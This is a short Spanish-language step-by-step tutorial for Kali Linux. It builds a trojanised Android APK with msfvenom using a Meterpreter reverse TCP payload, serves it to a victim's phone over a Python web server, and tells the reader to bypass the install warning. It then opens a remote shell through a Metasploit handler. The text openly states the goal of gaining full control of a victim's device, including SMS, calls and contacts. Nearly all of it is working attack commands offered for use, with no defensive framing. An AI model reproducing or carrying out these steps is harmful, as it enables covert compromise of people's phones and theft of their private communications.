IMPORTANTE: PARA HACER ESTE ATAQUE ES NECESARIO TENER UN SISTEMA OPERATIVO KALI LINUX
NIVEL DE DIFICULTAD:
Resumen: Vamos a crear desde la terminal de linux un apk infectado q enviaremos a la victima, una vez esa persona ejecute el apk tendremos acceso total a su dispositivo, pudiendo ver sus sms, enviar sms, llamadas, contactos, etc...
Paso nº1: Abrir terminal
Paso nº2: Ejecutar sudo su para entrar en modo root
Paso nº3: Ver ip privado con hostname -I
Paso nº4: Escribir msfvenom -p android/meterpreter/reverse_tcp LHOST=(tu ip privada) LPORT=433 -o virus.apk
Paso nº5: Crear servidor http con python para descargar el apk en el móvil python3 -m http.server 80
Paso nº6: Buscar en el navegador del móvil (tu ip privada):80 ejemplo 192.168.0.63:80 y descargar el apk
Paso nº7: Si al descargar te sale un aviso de que la aplicación no es segura, dale a más detalles e instalar de todas formas
Paso nº8: En la terminal escribe msfconsole
Paso nº9: Dentro del msfconsole escribe use /multi/handler
Paso nº10: Escribe set payload android/meterpreter/reverse_tcp
Paso nº11: Escribe set LHOST (tu ip privada)
Paso nº12: Escribe set LPORT 433
Paso nº13: Escribe run
Paso nº14: Ahora ejecuta el apk y acepta los permisos
Paso nº15: Y listo ya tienes el control de un dispositivo android, si no sabes que comandos utilizar escribe help y se te escribirán todos los comandos en la terminal